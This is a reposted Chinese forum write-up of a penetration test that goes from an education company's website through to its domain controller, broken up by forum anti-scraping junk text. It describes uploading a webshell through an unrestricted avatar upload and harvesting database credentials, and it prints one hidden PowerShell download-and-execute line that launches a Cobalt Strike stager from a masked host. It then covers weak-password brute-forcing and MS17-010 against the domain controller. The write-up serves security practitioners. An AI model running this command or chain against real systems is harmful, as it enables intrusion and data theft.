找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2098|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 X* t+ v# b7 \$ [, ]( ^8 X 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 5 X3 {% w2 h% X2 f

# Q& G# ?5 X; B2 f- S [& n+ X/ s

* K! N& h. B* D7 Z2 K* Q8 V   # A# x" I5 K7 e$ {% u* f' f

# r+ }* H' |# z2 e3 `

; g& x+ J& L2 l 正文 ! a0 O# z+ A$ i. ^! c6 v

: [* @7 f2 A- [

, B3 k% k2 s, k+ y& S   0 [! R- N$ |! ]' R: ^. y6 V

5 X) V( }0 Y9 s# U0 [

" |& f9 J" b5 C# z' d' {4 q4 \ 目标:www.xxxx.com(一家教育机构)
/ F4 q; F$ Q8 u2 f) a, s8 V
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 E2 n6 Q A: m B1 s

* |( l9 t# `4 w+ }

5 X9 q' q- ?. ^ ~" C. H" S vshapes=3 }$ o' d8 W/ e: p9 i' Y R/ [

' W4 r6 h P8 l# {" n- b

+ K4 R& g4 L {# v* U- V6 n# e 进行了简单的信息搜集
* B5 v- S4 N5 T% ~
* j+ T4 y' C C8 D {, E
8 i2 _0 I7 h- J

; ~' G3 ?0 Q: l9 l2 `

# B! p+ @4 W8 o& `/ r% j! B 子域名搜集. c: e7 @; s* Y4 T! B2 M

' f% J. m7 v2 C! e( y# {

8 k8 }, }% ^9 p) D2 [: h vshapes=# p5 v9 ?5 \5 G* P8 q

- R" E" ^' W! N" K0 t! Y7 Q

: d: ?0 K4 q1 c" z1 f1 Z fofa找资产
. D- d# i3 l+ s/ j3 K0 Y- p3 d
$ I4 Q4 R x% ?8 J# Y+ t3 Y1 m
@' b" L8 p1 E7 G. `5 f

8 j$ F( H" M& V* U/ J8 L6 A7 s

& O7 y* i( L, ^# _; ^' N9 l# P vshapes= % H9 I7 ]. K( Y+ Y2 E& X

0 J* }1 v9 o( X( t) k. C; M

0 o5 S' t. n9 A s 一共七个资产。去重之后只有两个。
0 h5 H2 ^" c; U5 z4 w
. @$ ?( R5 S2 X* U
* Y! z; u5 U" U" I

" f* X% _$ S+ B5 g0 K

, H8 p3 q5 f' D' O: w 目录探测 ) a4 u( G! a e5 P/ j& ^3 t# _

3 V" R$ _ L9 t+ B8 N7 _' k

; x+ ]( T! A9 Q6 s7 W" C7 e7 P vshapes=+ c* C6 o S' Z& X

) E7 X) x8 o3 X5 m2 d+ b; y v# C

& d& _. A6 G5 k! H, c 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( v; `) q! V) A5 G+ Q; ]
' p% k/ I: g0 l& k0 Y- Q$ z
7 l1 {# n X; a% j9 [! E2 f

4 t6 @4 M {, f2 [- @/ \

! c; y. h( W0 x. ?, C; H* G. U3 f J 我又尝试了通过修改返回包来绕过登录界面2 E5 v: T3 \" \% D- I

; R+ j4 e( d$ d! [

+ m+ m" C! ?1 h0 e vshapes=. F6 z* E9 n0 @$ R

3 x! g J2 c1 \1 {6 j$ L: A

1 ]5 X( }2 S) R5 h 还是不行,尝试注入无果 & A: j F! t4 }1 s/ t. z R) |

5 U6 `# y! t+ |, k9 E2 M

/ S9 v! z* f* l vshapes= ( k- G9 K0 [" l; i1 Y

. A: v1 O* [/ i+ Z }( I& }

2 m+ `! d/ h2 n2 ] 不过我目录探测出了一处Spring信息泄露
" l) J* g3 B. w$ d* _
6 K. \4 B5 B) W/ @+ b
: [1 h# s! |: o3 f; e0 |( T7 C

. G b, E& m0 s9 u c% c8 W

% Q4 R; g0 P% r/ R/ h$ a) F vshapes=- n9 d! H# [1 V+ O; C- j' A2 S

q" b: T" q& }- [- Q

, m# t' y6 I9 Q+ I6 } 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" w: O6 z/ q( L

1 g$ `/ q- F B K* D; D

6 {0 j1 b3 ~9 Y vshapes= % E5 f" _# S- C ?$ W- n

5 s& l3 |3 w5 k' G

; r8 }, ^' ~6 @" D* N1 r, e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。" y* |1 w& X L1 V

( D, l) W: V9 s- G! ~

3 W0 _( Q! r1 L3 m vshapes=0 y7 p! n3 ~6 Y+ P

" ^' J7 b2 D6 R, b

$ t: t/ V C: r! G0 a& O5 D5 a 获取有些师傅到这一步就手机抓包电脑测了。 - e1 a2 y4 Q: B* z# } r, r

} d0 f6 a# e- Q

4 g9 \" N* E) |7 P" @5 B! ]2 J, i Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 8 c$ R% u/ S6 z" B- y. p3 y

' x" |( V5 ?; h O/ w7 d

$ G6 G R6 X0 a7 @* V- ~2 {, a P 其中在一个公众号发现了小程序,可以进行注册。$ T4 Y0 O/ |6 u, _3 ~; ~2 I

' L* k5 k# l) W1 K3 k: }* C

7 o- A' L) S. h% C4 r- s 看到了头像上传,尝试上传获取WebShell 7 V8 Z' K/ U( r

2 D' B# v% |% t& a8 ]7 K; G1 [

# ]# W/ I& N0 H* g9 s8 R vshapes= & H. Z! W4 z1 O* q

! d4 J7 S: |8 a6 V, c

2 L: l4 n. T) ?8 S- M 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 ]: F9 O( K d2 H5 ^: r1 X" b) I

7 _* {1 |* w# u

! N& s; J2 g. M& X9 q2 n$ Z vshapes=# B; z& r: u# ^7 [: v+ K* n

7 h* Z- y# X3 v% V9 X' R9 E) a* q

; P1 D8 V( _0 U( M; k2 }8 C 然后上了大马 4 c) G5 h& B ~

0 S5 ?4 N5 [ h. k

- `& P& u7 K- g vshapes=% }$ y( A5 T- P* T# p l

A% w. t$ Y H) u

9 F1 O4 V( a: q. J: a- F5 f( t7 O vshapes= - b5 \+ w) Y8 _& C/ D9 y" ?' u

8 f7 L# o6 |7 _# f2 F5 d; g

& P) f: w, i9 n" Q$ J. A' Y 通过翻找文件发现数据库账号密码4 ~- c# ^4 w/ ^9 b8 A

& [2 R+ G# M4 V* a# Y& p+ W

3 J7 m5 m, p- R3 D$ Z vshapes=: ~8 d" V! `$ T1 }

( l! |2 o) @- O* {

8 d ?4 }- F* F --内网渗透; t. V+ d3 ^0 r8 W7 q

- p/ b2 a! ~' l- ^( H

0 x1 f/ L* `- H 直接通过powershell执行 cs上线' X- g% y; S$ a& [5 ~5 ^0 e

# Q* H2 N. c) U6 q

5 E2 T0 h5 N' @; {" ~ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! a, h! N/ P) [# x& C

& E) U5 R0 |, K4 @. k- Y

7 b' C3 R1 r6 M7 j) {2 \ vshapes= ) w6 W/ e! m: h: F* n; l

- R8 T. O& a- ^. `! T

- }/ |: v' J& |4 g4 v5 ` 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 : J* P% Z' @. k" R

' r g/ h% F4 L2 Y1 T

- N; U [* k- R) R, b vshapes=1 S0 U! n! `2 F8 y( ]& Z# }8 y# i

6 i6 ^+ {$ n8 z" G" a) M" I

9 V! }/ X! D9 w 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ N9 W& Q; ^# g8 c) s
, J6 @8 M* h7 u
* G" ~+ i7 ^; S* u7 o; a" {
. j! u$ u) v" S6 R; o+ H! V

, i" D" G. m4 f* V& E/ h

' d6 T1 _% e( V# T vshapes=5 \- K$ {7 r# Z; A

$ v/ W1 a+ P& }; f/ p

) r" d% G3 s+ K7 o 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 z* [6 d1 s$ E$ ^& y5 W
1 a9 o3 t, V7 W
5 w& b5 l. o& z, ~( _5 B2 }+ A

. I# M, U9 ^7 `9 F

% z; V: c% z! R vshapes=1 z" t/ x8 A, H' n# S: a

. o8 i! A5 V1 a# w: l9 d

; C$ `( m6 X8 J8 ~: U/ g
7 G" W. u5 s/ w$ \& z0 V4 ?
' p4 `' ]* Z5 O1 J' \
" N+ f/ ?; I7 n) a. G

1 B% c; b& Q; M$ s. d

/ v! F& P3 f* f  / i( X1 g2 Q0 @) T( ^- X0 ?

3 |+ h$ {2 E( `

q, E& M/ U( T& B2 z 小结7 }6 s; C: J% s1 C

0 D9 s# [: Q& X/ k

* n2 J/ D4 \% M' p2 @% F( b  8 h4 K4 {/ W5 D ^0 T1 k. H

1 }3 Z' F. f4 N

; _+ R, h6 A+ g: w# ^! T2 q$ Y. T 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ' d; O: [- Q% H% r+ ]4 L

( i4 ^: D. v) I) M4 u

8 { R8 i% m* T9 c4 g. ?   5 T2 @. u7 j! D: `' _

: F7 ~, w% s: Y; P6 Q) t
    ' {+ t- d1 y1 q
  • , C6 X* K7 L4 Q1 ~6 ]: m   & V& T5 Z8 A# h+ @
  • . `+ t% Z! R" y9 F R6 d
  • % i Z- j' s O. A9 o# m/ A3 K   / W+ B! m& P2 `
  • ; _4 H, C3 @9 `+ v3 k( _) Z
9 l$ o$ |1 S' h/ s$ M/ I. Z

1 o9 K2 _$ H, D0 s1 }! {, o8 r 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html9 f: R6 S% \6 o1 F* Z9 L6 d

' m) \& _7 p4 j5 ]

! N' f7 x0 I V0 [& f" `7 O  . u# n5 F8 y7 A8 D

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表